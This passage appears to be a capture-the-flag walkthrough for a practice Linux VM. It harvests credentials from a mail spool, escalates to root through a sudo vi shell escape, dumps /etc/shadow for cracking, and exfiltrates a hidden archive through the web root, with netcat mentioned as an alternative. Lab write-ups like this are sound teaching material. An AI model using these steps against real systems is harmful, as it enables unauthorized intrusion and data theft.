 N  6 Abel Magwitch      Mon Jan 14 00:05   20/915   vacation
 N  7 noreply@fermion.he Mon Jan 14 00:05   29/983   Fermion Account Login Rem
Message  1:
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:47:48 +0000
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Will do.

Message  2:
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
From: Estella Havisham <>
Date: Sun, 13 Jan 2008 23:50:33 +0000
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Thanks!  Glad to be here.

Message  3:
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:48:57 +0000
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

I set her up with an accountus servers.  I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw.

Message  4:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
From: Estella Havisham <>
Date: Mon, 14 Jan 2008 00:03:56 +0000
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

Message  5:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:55:41 +0000
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Hey, I'll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?

Message  6:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
From: Abel Magwitch <>
Date: Sun, 13 Jan 2008 23:58:28 +0000
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Sure - so far, she's doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

Message  7:
From  Mon Jan 14 00:05:15 2008
Return-Path: <>
Date: Sun, 13 Jan 2008 23:54:42 +0000
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Fermion Support

Password: 0l1v3rTw1st

From the email exchange we have to potential sets of credentials havisham:changeme and pirrip:0l1v3rTw1st. Lets try to get elevated privileges with the pirrip password first, since we are already logged in.

pirrip@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

 #1) Respect the privacy of others.
 #2) Think before you type.
 #3) With great power comes great responsibility.

User pirrip may run the following commands on this host:
 (root) /usr/bin/more
 (root) /usr/bin/tail
 (root) /usr/bin/vi
 (root) /usr/bin/cat ALL

vi can be used to get shell, I learned this in a long drawn out penetration test where I got a similar restricted shell through the Shellshock vulnerability. In vi the :! command instructs vi to execute a shell command, lets try it.

pirrip@slax:~$ sudo vi

sh-3.1# cat /etc/shadow


Use :q to exit vi. Feed the password hashes to John or Hashcat and let it cook! Time passes, seasons change. The wedding dress becomes torn and the feast rots on the table, I had to read Charles Dickens in college.

pirrip@slax:~$ su -
Password: **************
root@slax:~# ls -a
./   .ICEauthority  .Xresources  .fluxbox/       .fonts.conf  .joerc  .kderc   .mc/       .qt/    Desktop/
../  .Xauthority    .config/     .fonts.cache-1  .icons@      .kde/   .local/  .mplayer/  .save/  Set\ IP\ address
root@slax:~# cd .save
root@slax:~/.save# ls -a
./  ../*

We found the file but how do we get it over to our system to check it out? There are a few possible options.

  1. Build a netcat listener and pipe the file over.
  2. Move the file to the FTP root and copy it across.
  3. Move it to the ~root directory and download it from the website.

Netcat is installed on server and this is an option but I am lazy so I ran the following commands to copy the file to the website and give read permissions to everyone:

/home/root/.save# cp /www/101/home/root/
chmod 744
Archive on Website

Figure 2 – Archive on Website

After copying it to the local system unzip the archive and untar the file from the zip.

tar -xzf great_expectations.tar
Archive Contents

Figure 3 – Archive Contents

The greatest piece of advice that I have received on Linux is how to remember the tar switches; say the following in a thick cartoonish german accent ‘Extract Zee Files’. tar -xzf, will this sound dumb when you do it? Yes. Will you remember it without looking at help? Yes.

The Charles_Dickens_3.jpg and Great_Expectations.pdf are pretty self explanatory. Lets look at the Jan08 file cat.

root@kali:~/Desktop/s2-100/great_expectations# cat Jan08 
From  Sun Jan 13 23:53:37 2008
Return-Path: <>
Received: from (localhost [])
    by (8.13.7/8.13.7) with ESMTP id m0DNlmHb009636
    for <>; Sun, 13 Jan 2008 23:47:48 GMT
Received: (from
    by (8.13.7/8.13.7/Submit) id m0DNlmDI009635
    for pirrip; Sun, 13 Jan 2008 23:47:48 GMT
From: Bill Sikes <>
Message-Id: <>
Date: Sun, 13 Jan 2008 23:47:48 +0000
Subject: Raises
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's the data for raises for your team:
Philip Pirrip:  734-67-0424 5.5% $74,224
Abel Magwitch:  816-03-0028 4.0% $53,122
Estella Havisham: 762-93-1073 12% $84,325

That is the data we were looking for. But, what about that other .jpg file that won’t do a preview? It won’t open in image software, maybe they are trying to obfuscate the file type by changing the extension? Use the file command in Linux to analyze the type.

file 363px-Charles_dickensyoung.jpg 
363px-Charles_dickensyoung.jpg: POSIX tar archive (GNU)

Thats not a JPG at all! Lets rename the file and take a look inside. Maybe that Jan08 file was a decoy. Nope it as just a second copy of the original archive but now you know how to file command. This was the best of times and the worst of times. I hope that you learned at least one thing that you will be able to put into practice in the future.